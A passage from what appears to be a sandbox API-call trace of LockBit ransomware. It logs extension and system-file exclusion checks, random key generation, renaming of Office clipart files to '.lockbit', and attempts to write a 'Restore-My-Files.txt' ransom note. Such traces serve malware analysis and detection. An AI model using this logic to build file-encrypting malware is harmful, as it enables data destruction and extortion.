returned -1 [0176.620] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.620] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.620] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF.lockbit") returned 72 [0176.620] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02045_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0176.621] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.621] malloc (_Size=0x40068) returned 0x3d70450 [0176.621] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=9836) returned 1 [0176.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0176.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0176.622] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.627] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.627] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.627] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.628] free (_Block=0x1fa2ed8) [0176.628] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.628] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.628] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1fde, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02048_.WMF", cAlternateFileName="")) returned 1 [0176.628] lstrcmpiW (lpString1=".", lpString2="SO02048_.WMF") returned -1 [0176.628] lstrcmpiW (lpString1="..", lpString2="SO02048_.WMF") returned -1 [0176.629] PathFindExtensionW (pszPath="SO02048_.WMF") returned=".WMF" [0176.629] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.629] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.638] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.639] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.639] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02048_.WMF") returned -1 [0176.639] lstrcmpiW (lpString1="ntldr", lpString2="SO02048_.WMF") returned -1 [0176.639] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02048_.WMF") returned -1 [0176.639] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02048_.WMF") returned -1 [0176.639] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02048_.WMF") returned -1 [0176.639] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02048_.WMF") returned 1 [0176.639] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02048_.WMF") returned -1 [0176.640] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.640] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF") returned=".WMF" [0176.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.640] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.640] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.640] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF.lockbit") returned 72 [0176.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02048_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0176.645] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.645] malloc (_Size=0x40068) returned 0x3f70048 [0176.645] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8158) returned 1 [0176.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0176.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0176.646] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0176.649] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.649] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.649] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.650] free (_Block=0x1fa2ed8) [0176.650] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.650] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.650] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2c2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02051_.WMF", cAlternateFileName="")) returned 1 [0176.650] lstrcmpiW (lpString1=".", lpString2="SO02051_.WMF") returned -1 [0176.650] lstrcmpiW (lpString1="..", lpString2="SO02051_.WMF") returned -1 [0176.650] PathFindExtensionW (pszPath="SO02051_.WMF") returned=".WMF" [0176.650] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.650] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.650] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.651] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.651] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.652] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02051_.WMF") returned -1 [0176.652] lstrcmpiW (lpString1="ntldr", lpString2="SO02051_.WMF") returned -1 [0176.652] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02051_.WMF") returned -1 [0176.653] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02051_.WMF") returned -1 [0176.653] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02051_.WMF") returned -1 [0176.653] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02051_.WMF") returned 1 [0176.653] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02051_.WMF") returned -1 [0176.653] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.653] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF") returned=".WMF" [0176.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.653] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.653] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.654] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.654] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF.lockbit") returned 72 [0176.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02051_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0176.655] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.655] malloc (_Size=0x40068) returned 0x3e70008 [0176.656] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=11308) returned 1 [0176.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0176.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0176.657] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0176.662] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.662] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.662] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.663] free (_Block=0x1fa2ed8) [0176.663] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.663] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.663] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.663] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1d7400, ftCreationTime.dwHighDateTime=0x1bd4be9, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8e1d7400, ftLastWriteTime.dwHighDateTime=0x1bd4be9, nFileSizeHigh=0x0, nFileSizeLow=0x30ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02054_.WMF", cAlternateFileName="")) returned 1 [0176.664] lstrcmpiW (lpString1=".", lpString2="SO02054_.WMF") returned -1 [0176.664] lstrcmpiW (lpString1="..", lpString2="SO02054_.WMF") returned -1 [0176.664] PathFindExtensionW (pszPath="SO02054_.WMF") returned=".WMF" [0176.664] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned 